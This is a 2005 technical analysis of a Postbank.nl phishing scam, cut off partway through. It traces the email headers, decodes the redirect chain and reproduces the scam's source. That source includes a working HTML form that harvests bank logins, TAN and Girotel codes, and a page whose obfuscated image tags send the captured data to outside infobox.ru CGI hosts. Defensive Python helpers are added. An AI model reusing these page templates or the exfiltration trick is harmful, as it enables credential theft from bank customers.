Analysis: Postbank.nl Phishing Scam
Vincent 'rastakid' van Scherpenseel - SYN-ACK.org - 6 June 2005
Introduction:
I receive lots of phishing e-mail daily, and most of it is recognized as spam right away and moved to my spam folder. The ones that aren't recognized correctly I delete manually upon arrival. Browsing through my spam folder today, I came across a scam which tried to trick people into giving up their Postbank.nl credentials. I was intrigued by this particular piece of mud because it was the first time I had seen a Postbank scam. Postbank is one of the largest banks operating in The Netherlands, and is also the one with the worst security measures in place. While all other banks work with digital tokens (or random readers, as they're called), Postbank still holds on to a username/password login combined with TAN codes. Postbank clients can view their account balance using only their username and password and are only required to enter a TAN code when they want to make a transaction. Every time a client runs out of TAN codes he/she receives a new batch.
Another way of telebanking with Postbank is the use of Girotel Online. Clients have to supply their Girotelnumber, codenumber and GIN code to have full access to their account.
This analysis looks only at the technical side of the scam. Although I think my analysis gives some pointers as to who the scammers may be and where they are, it was written to look at how this particular scam is done. A couple of hours after I started writing this analysis the scam had already received big media attention here in The Netherlands: it was featured on major news sites and radio broadcasts after the government CERT (Computer Emergency Response Team) released a warning about it. Note that there are several variations of the scam e-mail floating around, pointing to different websites. I decided to analyse only the e-mail I received myself.
The e-mail:
Let's start off with the e-mail I received. Here is the full version; the only changes made are the conversion from text/plain to HTML, removal of excessive newlines, hiding of my private e-mail address and de-linking of the malicious URL.
Return-Path: <BenedettaBruno@postbank.nl>
Received: from vas02.wanadoo.nl (vas02.wanadoo.nl [194.134.35.217])
by pop1.euronet.nl (Postfix) with ESMTP id 46E662ACBCA
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
by vas02.wanadoo.nl (Postfix) with ESMTP id 37CB92A9561
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (CEST)
Received: from vas02.wanadoo.nl ([127.0.0.1])
by localhost (vas02.wanadoo.nl [127.0.0.1]) (amavisd-new-wb5, port 10024)
with ESMTP id 12540-53 for <p54227100@pop1.euronet.nl>;
Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from mx1.euronet.nl (mx1.euronet.nl [194.134.35.134])
by vas02.wanadoo.nl (Postfix) with ESMTP id 7BCB92A9555
for <************@euronet.nl>; Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from 132-8.200-68.tampabay.res.rr.com (132-8.200-68.tampabay.res.rr.com [68.200.8.132])
by mx1.euronet.nl (Postfix) with SMTP id 9359C58320
for <************@euronet.nl>; Sat, 4 Jun 2005 03:56:41 +0200 (MEST)
Message-ID: <173a01c5649e$054029eb$d36eefa1@postbank.nl>
From: Postbank.nl <BenedettaBruno@postbank.nl>
To: ************@euronet.nl
Subject: ***SPAM*** =?iso-8859-1?B?UG9zdGJhbmsgRW1haWwgVmVyaWZpY2F0aW9uIC0gc2NoZXJwZW5zZWVsQGV1cm9u?=
=?iso-8859-1?B?ZXQubmw=?=
Date: Sun, 29 May 2005 22:32:26 +0000
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="----=_NextPart_000_0000_42715370.3CB1ABCF"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express V6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-Virus-Scanned: Wanadoo VAS
X-Spam-Status: Yes, hits=6.5 tagged_above=4.9 required=4.9 tests=BAYES_44,
CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,
HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
X-Spam-Level: *******
X-Spam-Flag: YES
X-UIDL: 18d4c6eb5308141f578487627c916740
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
This is a multi-part message in MIME format.
------=_NextPart_000_0000_42715370.3CB1ABCF
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_EF4ABF4E.C7EC9C49"
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Dear Postbank Customer,
This email was sent by the Postbank server to verify your e-mail address. You must complete this process by
clicking on the link below and entering in the small window your Postbank online access details. This is done for
your protection - because some of our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address, click on the link below:
<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>
------=_NextPart_001_0001_EF4ABF4E.C7EC9C49--
------=_NextPart_000_0000_42715370.3CB1ABCF--
As you can see, the scam mail has been marked as spam by the SpamAssassin software at my ISP's (Wanadoo.nl) mail server. The reasons are:
BAYES_44, CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE, HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
Translated into human-readable terms: the e-mail has a Bayesian spam probability of 44 to 50%, the author asks the reader to click on a link below, the e-mail is dated more than 96 hours in the past, the e-mail contains forged Outlook headers (tags) to look authentic, the e-mail is written in HTML instead of text/plain, the body contains unnecessary %-escapes in a URL, and the sender is listed in the SORBS (Spam and Open Relay Blocking System) blacklist.
The e-mail was sent from a machine named 132-8.200-68.tampabay.res.rr.com, which resolves to 68.200.8.132. The 'tampabay' part of the hostname most probably means that the machine is located in Tampa Bay, Florida, USA. The machine didn't reply to ICMP echo requests (ping) at the time of writing. Portscanning the machine for commonly abused ports (25/smtp, 80/http, 1080/socks, 3128/squid-http, 8080/http-proxy) resulted in an 'all ports filtered' message. The owner of rr.com is Road Runner, one of the largest cable broadband ISPs in the United States and part of the Time Warner network. Road Runner does offer dial-up, but that's mostly for users in need of remote access to the Road Runner network. My best guess is that this message was sent through this machine because it is or was a misconfigured proxy server, an open SMTP relay, a trojaned botnet victim, or because it has an open wifi access point attached to it. The last possibility would narrow the sender down to a specific geographical location: Tampa Bay, Florida, USA.
The last thing we look at before moving on to the body of the message is the 'From' header: Postbank.nl <BenedettaBruno@postbank.nl>. Benedetta Bruno seems to be an Italian name. All the scam e-mails were sent with Italian names.
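As an added example (not the author's tooling), here is a small Python script that walks the Received: chain the way the paragraphs above do by hand and reads the SpamAssassin verdict from the X-Spam-Status header. The header text is constructed from the headers quoted above, with the recipient address replaced by a placeholder; the "sender domain absent from the relay chain" check at the end is a coarse heuristic of my own, not something the page describes.

```python
"""Added example: trace a mail's Received: chain and read its spam verdict.
Not the author's tooling; headers below are constructed from the page."""
import email
import re
from email.utils import parseaddr

# Constructed from the headers quoted above; recipient address masked.
RAW_HEADERS = """\
Return-Path: <BenedettaBruno@postbank.nl>
Received: from vas02.wanadoo.nl (vas02.wanadoo.nl [194.134.35.217])
    by pop1.euronet.nl (Postfix) with ESMTP id 46E662ACBCA
    for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
    by vas02.wanadoo.nl (Postfix) with ESMTP id 37CB92A9561
    for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (CEST)
Received: from vas02.wanadoo.nl ([127.0.0.1])
    by localhost (vas02.wanadoo.nl [127.0.0.1]) (amavisd-new-wb5, port 10024)
    with ESMTP id 12540-53 for <p54227100@pop1.euronet.nl>;
    Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from mx1.euronet.nl (mx1.euronet.nl [194.134.35.134])
    by vas02.wanadoo.nl (Postfix) with ESMTP id 7BCB92A9555
    for <masked@euronet.nl>; Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from 132-8.200-68.tampabay.res.rr.com (132-8.200-68.tampabay.res.rr.com [68.200.8.132])
    by mx1.euronet.nl (Postfix) with SMTP id 9359C58320
    for <masked@euronet.nl>; Sat, 4 Jun 2005 03:56:41 +0200 (MEST)
From: Postbank.nl <BenedettaBruno@postbank.nl>
X-Spam-Status: Yes, hits=6.5 tagged_above=4.9 required=4.9 tests=BAYES_44,
    CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,
    HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
X-Spam-Flag: YES
"""

# "from <claimed host> (<reverse DNS> [<ip>]) ... by <receiving host>"
HOP_RE = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?.*?\bby\s+(\S+)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(raw: str) -> list:
    """Return the Received: chain in the order the mail travelled. Each relay
    prepends its header, so the bottom-most one is the hop closest to the sender."""
    msg = email.message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())  # unfold continuation lines
        m = HOP_RE.search(value)
        if not m:
            continue
        claimed, paren, receiver = m.groups()
        ip = IP_RE.search(paren or "")
        hops.append({"claimed": claimed, "ip": ip.group(1) if ip else None, "by": receiver})
    return hops


def origin(raw: str) -> dict:
    """First hop that is not a loopback relay: the host that handed the mail to
    the recipient's MX. Only headers added by your own servers can be trusted;
    anything the sender put below them could be forged."""
    for hop in received_hops(raw):
        if hop["ip"] and not hop["ip"].startswith("127."):
            return hop
    return {}


def spam_verdict(raw: str) -> dict:
    """Pull score, threshold and the rule names out of X-Spam-Status."""
    msg = email.message_from_string(raw)
    status = " ".join((msg.get("X-Spam-Status") or "").split())
    hits = re.search(r"hits=([\d.]+)", status)
    required = re.search(r"required=([\d.]+)", status)
    tests = re.search(r"tests=(.*)$", status)
    return {
        "flagged": (msg.get("X-Spam-Flag") or "").strip().upper() == "YES",
        "hits": float(hits.group(1)) if hits else None,
        "required": float(required.group(1)) if required else None,
        "tests": [t.strip() for t in tests.group(1).split(",")] if tests else [],
    }


def from_domain_absent_from_path(raw: str) -> bool:
    """Coarse heuristic (assumption, not from the page): the From: domain never
    appears as a relay in the chain, as with postbank.nl here."""
    msg = email.message_from_string(raw)
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    seen = " ".join(h["claimed"].lower() for h in received_hops(raw))
    return bool(domain) and domain not in seen


if __name__ == "__main__":
    for hop in received_hops(RAW_HEADERS):
        print(f"{hop['claimed']} [{hop['ip']}] -> {hop['by']}")
    print("origin:", origin(RAW_HEADERS))
    print("spam:", spam_verdict(RAW_HEADERS))
    print("From: domain absent from path:", from_domain_absent_from_path(RAW_HEADERS))
```

The chain is printed sender-first, so the first line is the rr.com host the text identifies; the 127.0.0.1 hops are the ISP's own amavisd scanner loop and are skipped when picking the origin.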
Okay, let's take a look at the body. The first thing that comes to mind is that the e-mail was not sent in correct HTML format. My Linux-based e-mail client KMail, part of the Kontact groupware suite, didn't recognize this message as an HTML message and therefore didn't allow me to view it as such. The reason for this is probably that the body is wrapped in several MIME parts: it's a malformed multi-part message.
The message asks the Postbank client (or actually any recipient, since I'm not a Postbank client) in English to verify their e-mail address by clicking on the provided link and entering their Postbank login credentials. The scammers would probably have had more success if the message had been written in Dutch, so I guess that rules out that they're native Dutch speakers. Let's take a closer look at that link:
<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>
If a victim's e-mail client renders the HTML correctly, he/she only sees the 'http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3' part. The random-looking code after the Postbank URL has no effect on the click, since the anchor points somewhere else entirely; my guess is that it was just added to look authentic. Anyway, the visible part of the link is not the malicious part: it's all about the URL in the href attribute. As we can see, the senders used two in-link redirections: first the victim goes to the Spanish Google, which redirects him/her to MSN, which then redirects the victim to the final link destination: 'http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/'. The Google and MSN prefixes were probably added to trick the victim into thinking he has arrived at a legitimate location: the victim recognizes the words Google and MSN and doesn't pay much attention to the 'strange codes' at the end of the URL.
Time to decode the final link destination. I put together a very simple Perl script, based on Glenn Fleishman's code, to decode the URL:
Enter URL: http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/
Do you want to [E]ncode or [D]ecode: D
The URL: http://hkschf o.d% a.R% U/
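The same decode in Python, as an added example rather than the author's Perl script. It goes a little further than the script: it peels the two open-redirect parameters out of the href, decodes the %-escapes tolerantly (a '%' not followed by two hex digits is kept verbatim, which is what produces the stray '%' signs in the output above), applies the clean-up described next, and finally compares the host the victim sees in the link text with the host the link really goes to. The href and the visible link text are the ones quoted from the mail; the parameter names used for peeling (q, target, url) are an assumption.

```python
"""Added example (not the author's Perl script): decode the obfuscated link
from the phishing mail and compare where it seems to go with where it goes."""
from urllib.parse import urlsplit

# The href and visible link text quoted from the mail.
HREF = ("http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp"
        "?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/")
VISIBLE = ("http://www.postbank.nl/"
           "gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3")

HEXDIGITS = set("0123456789abcdefABCDEF")


def tolerant_unquote(s: str) -> str:
    """Decode %XX escapes one at a time. A '%' that is not followed by two hex
    digits (like the '%%09' sequences above) is kept verbatim instead of
    raising; that is how the stray '%' signs in the decoded URL arise."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and s[i + 1] in HEXDIGITS and s[i + 2] in HEXDIGITS:
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def strip_junk(s: str) -> str:
    """The clean-up step: drop whitespace and the leftover '%' characters,
    then lowercase the host (DNS names are case-insensitive)."""
    s = "".join(ch for ch in s if not ch.isspace() and ch != "%")
    parts = urlsplit(s)
    return parts._replace(netloc=parts.netloc.lower()).geturl()


def peel_redirects(url: str, hop_params=("q", "target", "url")) -> list:
    """Follow open-redirect style parameters (?q=..., ?target=...) without
    touching the network, returning every hop in the order the victim would
    visit them. The parameter names are an assumption that covers this mail."""
    chain = [url]
    while True:
        _, has_query, query = url.partition("?")
        name, has_value, value = query.partition("=")
        if not has_query or not has_value or name not in hop_params:
            return chain
        url = value.split("&", 1)[0]
        chain.append(url)


def analyse(href: str, visible: str) -> dict:
    """Peel, decode, clean, and compare the visible host with the real one."""
    chain = peel_redirects(href)
    decoded = tolerant_unquote(chain[-1])
    final = strip_junk(decoded)
    visible_host = urlsplit(visible).hostname
    final_host = urlsplit(final).hostname
    return {
        "hops": chain,
        "decoded_raw": decoded,                  # what the Perl script printed
        "final_url": final,
        "visible_host": visible_host,
        "final_host": final_host,
        "mismatch": visible_host != final_host,  # the phishing tell
    }


if __name__ == "__main__":
    for key, value in analyse(HREF, VISIBLE).items():
        print(f"{key}: {value!r}")
```

A mail filter can apply the last check generically: whenever an anchor's visible text looks like a URL, the host in that text should equal the host of the href's final destination, and any difference is worth flagging regardless of which redirectors sit in between.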
Removing the whitespace and the excess %-signs we get: http://hkschfo.da.RU/. Da.ru is a Russian free URL service where anyone can register a http://yourname.da.ru URL at no charge. The next step is to request the HTTP headers from hkschfo.da.ru:
[vincent@matrix sandbox]$ telnet hkschfo.da.ru 80
Trying 195.161.113.135...
Connected to hkschfo.da.ru (195.161.113.135).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:hkschfo.da.ru
HTTP/1.1 302 Found
Date: Sat, 04 Jun 2005 18:11:14 GMT
Server: Apache/1.3.9 (Unix) da.ru/1.2/DeathMatch
Location: http://dlkrexae.nm.ru/
Connection: close
Content-Type: text/html
As you can see, the visitor is directly redirected via a 302 to dlkrexae.nm.ru. Nm.ru is also a free URL service, but unfortunately I don't speak Russian so I can't find out much more about it. This is the third redirection! Let's examine the HTTP headers of dlkrexae.nm.ru:
[vincent@matrix sandbox]$ telnet dlkrexae.nm.ru 80
Trying 212.48.140.151...
Connected to dlkrexae.nm.ru (212.48.140.151).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:dlkrexae.nm.ru
HTTP/1.1 200 OK
Date: Sat, 04 Jun 2005 17:38:11 GMT
Server: Apache/1.3.27 (Unix)
Last-Modified: Sat, 04 Jun 2005 11:44:45 GMT
ETag: "d283dc-1c8-42a1942d"
Accept-Ranges: bytes
Content-Length: 456
Connection: close
Content-Type: text/html; charset=windows-1251
Finally, real content. Or not? Let's view the source:
<HTML><HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.postbank.nl/">
<SCRIPT language=JavaScript>
// ensure top window
if (window != top)
{
top.location = window.location;
}
</SCRIPT>
<title></title></HEAD>
<BODY bgColor=#ffffff onload="window.open('welcome3.html', 'miqoo9', 'top=150,left=370,width=430,height=440,toolbar=no,location=no,scrollbars=no,resizable=no')">
</BODY></HTML>
Jackpot! This is the trick: using JavaScript a popup window is spawned on page load, and directly after loading the visitor is redirected to the fifth and final destination: the website of Postbank, www.postbank.nl. The page loaded inside the popup window is http://dlkrexae.nm.ru/welcome3.html:
<html lang="en">
<head>
<title>E-mail Verification - Postbank.nl</title>
<link rel="stylesheet" type="text/css" href='https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008'>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<center>
<br>
<table width="430" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="150" valign="top"></td>
<td width="10"> </td>
<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="left"><center><img src=sim.gif></center></td>
</tr>
</table>
<hr size="1">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
<br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Mijn Postbank.nl Clients:</font></center></td>
</tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> UserID (Gebruikersnaam): </font></td>
<td align="left" valign="bottom"><input type="text" name="bankn" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> Password (Wachtwoord): </font></td>
<td align="left" valign="bottom"><input type="password" name="word" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For ALL Clients - enter your next three TAN codes:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="vol1" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass1" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol2" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass2" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol3" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass3" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""><input type="hidden" name="ve" value="se"></td>
</td>
</tr></table>
</center>
</td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Girotel Online Clients:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>Girotelnummer</font></td><td align="center"> </td><td align="center"><font size=2>Codenummer</font></td><td align="center"> </td><td align="center"><font size=2>GIN-code</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="girn" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="conum" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="gcod" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td></td>
</td>
</tr></table>
</center>
</td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="57%"> </td>
<td align="right" class="body">
<input type="button" name="loginButton" value=" Verify " onclick=javascript:aceptar()>
</td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</td>
<td width="10"> </td>
</tr>
</table>
</center>
</body>
<script>
function Submitir() {
document.formulario.submit();
}
function aceptar() {
if (document.formulario.vol1.value != '')
{
if (document.formulario.pass1.value != '')
{
if (document.formulario.vol2.value != '')
{
if (document.formulario.pass2.value != '')
{
if (document.formulario.vol3.value != '')
{
if (document.formulario.pass3.value != '')
{
Submitir();
}
else
{
alert("You need to enter your third VALID NEXT TAN code!");
document.formulario.pass3.focus();
}
}
else
{
alert("You need to enter Volgnummer of your third VALID NEXT TAN code!");
document.formulario.vol3.focus();
}
}
else
{
alert("You need to enter your second VALID NEXT TAN code!");
document.formulario.pass2.focus();
}
}
else
{
alert("You need to enter Volgnummer of your second VALID NEXT TAN code!");
document.formulario.vol2.focus();
}
}
else
{
alert("You need to enter your first VALID NEXT TAN code!");
document.formulario.pass1.focus();
}
}
else
{
alert("You need to enter Volgnummer of your first VALID NEXT TAN code!");
document.formulario.vol1.focus();
}
}
</script>
</html>
This is the page where the Postbank client is asked to enter his/her username, password and the next three TAN codes. During my analysis I discovered that a new section had been added to the page since the first time I saw it: the scam now also has 'support' for Postbank Girotel Online clients, asking them for their Girotelnumber, codenumber and GIN code. Using these credentials the scammers have full access to the Postbank client's Girotel account. The fact that this was added hours after the first e-mails were sent means that the scammers are still actively working to perfect their scam.
Let's take a look at the source. The first thing that jumps out is the inclusion of a stylesheet from an HTTPS resource:
<link rel="stylesheet" type="text/css" href='https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008'>
This is very odd: the stylesheet defines lots of classes which aren't used within the welcome3.html page. The domain national.com.au belongs to the National Australia Bank, a business bank operating in Australia, New Zealand and the United Kingdom. Why would the scammers use a stylesheet so bloated with styling rules they aren't going to use? My guess: since the stylesheet is retrieved over a secured HTTP connection, some browsers may mark this page as 'safe'. Victims will more easily fall for the trick if they see a 'secure' little lock in their browser, even more so if the connection is to a bank. It doesn't matter to Firefox users though: Firefox doesn't recognize the page as secure. I also tested it with the latest Internet Explorer and that browser didn't recognize the page as secure either.
I chose not to include the stylesheet in this document since I didn't think it was relevant enough. Next, the form:
<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
What happens here is that the form content is sent via an HTTP GET request to the page obr2.html, so the filled-in values end up in the query string of the URL. Along with the user-entered data there's a hidden field, 'go', containing the value 'hm'. This value is static: it didn't change when I re-requested the page. I know that the scammers have set up many free URL redirects, so this may be a way for them to recognize where the data came from and perhaps to find out if a redirect is down.
What we also see is that the JavaScript functions have Spanish names: function Submitir(), document.formulario.submit() and function aceptar(). This could mean that the scammers speak Spanish, but the code could also have been taken from an example found on the Internet.
The transaction:
Time to fill out some paperwork. Surfing through an anonymous open proxy server, I entered some bogus information in the text boxes while I had a packet sniffer running on my gateway. This is what came through:
GET http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&conum=&gcod= HTTP/1.1
All the data I filled in is sent using a GET request to the page obr2.html, as expected. This is what obr2.html's source looks like:
<html>
<head>
<title></title>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=rezult.html">
</head>
<body>
<center><img width=1 height=1 src="http://z33455& #046;infobox.ru/cg i-bin/result/& #105;mg10.cgi"><br><img width=1 height=1 src="http://z33431& #046;infobox.ru/cg i-bin/result/& #105;mg10.cgi">
<br><br><br>
</b><br><br><b><br>
</center>
</body>
</html>
The page obr2.html displays two 'images' and forwards the victim to another page, rezult.html, one second after page load. The sources of the images are obfuscated with HTML character entity encoding. Decoded, the image tags read:
<img width=1 height=1 src="http://z33455.infobox.ru/cgi-bin/result/img10.cgi"><br><img width=1 height=1 src="http://z33431.infobox.ru/cgi-bin/result/img10.cgi">
What this does is simple: the HTML loads two CGI scripts as images. This is where the data gets sent to the scammers: along with the request for the two 'images', the browser sends the Referer header, and inside that Referer are the fake Postbank credentials I entered. Unfortunately I'm not able to take a look at the CGI scripts, since CGI runs server-side, meaning that only the script's output gets sent back. These CGI scripts didn't generate any output other than an HTTP 200 OK status, meaning that the CGI scripts are still alive; otherwise an HTTP 404 File Not Found or some Forbidden error would probably have been issued. The data is probably e-mailed from the CGI scripts to the scammers. The reason two CGI scripts were included is probably redundancy. This is one of the two requests logged by my packet sniffer:
GET http://z33431.infobox.ru/cgi-bin/result/img10.cgi HTTP/1.1
Host: z33431.infobox.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&conum=&gcod=
The other request was completely identical, except for the hostname (z33455.infobox.ru instead of z33431.infobox.ru). Infobox.ru is a web hosting company which doesn't seem to offer free URLs, but it does offer a one-month free trial period. Chances are that's what the scammers used.
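Two checks for this stage, as an added example that is not the author's tooling: decoding the entity-obfuscated img tags, and parsing a captured request to see exactly which form fields leak to the image host through the Referer header. The img tags and the request are constructed from the obr2.html source and the sniffer output quoted above (with the numeric entities written contiguously and a few headers trimmed); the table mapping field names to their meaning is taken from the welcome3.html form.

```python
"""Added example (not the author's tooling): decode the obfuscated tracking
images in obr2.html and show what the browser leaks to them via Referer."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the obr2.html source quoted above (entities written contiguously).
OBR2_HTML = (
    '<img width=1 height=1 src="http://z33455&#046;infobox.ru/cgi-bin/result/&#105;mg10.cgi">'
    '<br><img width=1 height=1 src="http://z33431&#046;infobox.ru/cgi-bin/result/&#105;mg10.cgi">'
)

# Constructed from the request the author's sniffer logged (headers trimmed).
CAPTURED_REQUEST = """GET http://z33431.infobox.ru/cgi-bin/result/img10.cgi HTTP/1.1
Host: z33431.infobox.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Referer: http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&conum=&gcod=
"""

# Field names from the welcome3.html form and what each one carries.
SENSITIVE = {
    "bankn": "username", "word": "password",
    "pass1": "TAN", "pass2": "TAN", "pass3": "TAN",
    "girn": "Girotelnumber", "conum": "Girotel codenumber", "gcod": "GIN code",
}

IMG_SRC = re.compile(r'<img[^>]*\ssrc="([^"]*)"', re.I)


def image_sources(page: str) -> list:
    """Every <img src>, with HTML character references decoded so that
    'z33455&#046;infobox.ru' reads as the host it really is."""
    return [html.unescape(src) for src in IMG_SRC.findall(page)]


def third_party_images(page: str, page_host: str) -> list:
    """Image loads that go to a host other than the page's own: each of these
    receives the page URL, query string included, as the Referer."""
    return [src for src in image_sources(page) if urlsplit(src).hostname != page_host]


def referer_leak(raw_request: str) -> dict:
    """Parse one captured request and report which form fields travel to the
    image host inside the Referer header."""
    lines = raw_request.splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    referer = headers.get("referer", "")
    fields = parse_qs(urlsplit(referer).query, keep_blank_values=True)
    # Only fields the victim actually filled in are leaked; empty ones are noise.
    leaked = {k: SENSITIVE[k] for k, v in fields.items() if k in SENSITIVE and v[0]}
    image_host = urlsplit(target).hostname
    referer_host = urlsplit(referer).hostname
    return {
        "image_host": image_host,
        "referer_host": referer_host,
        "cross_site": image_host != referer_host,
        "leaked_fields": leaked,
    }


if __name__ == "__main__":
    for src in third_party_images(OBR2_HTML, "dlkrexae.nm.ru"):
        print("third-party image:", src)
    print(referer_leak(CAPTURED_REQUEST))
```

The two things that make this exfiltration work are visible in the output: the form used GET, so the secrets sit in the page URL, and the page then loads resources from another host, so the browser hands that URL over in Referer. A login form that uses POST keeps the credentials out of the URL, out of proxy logs and out of any Referer a third-party resource could receive.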
Alright, on to the final result. As said, one second after page load (giving the images time to load) the victim is forwarded to rezult.html. This is the source code of rezult.html:
<html>
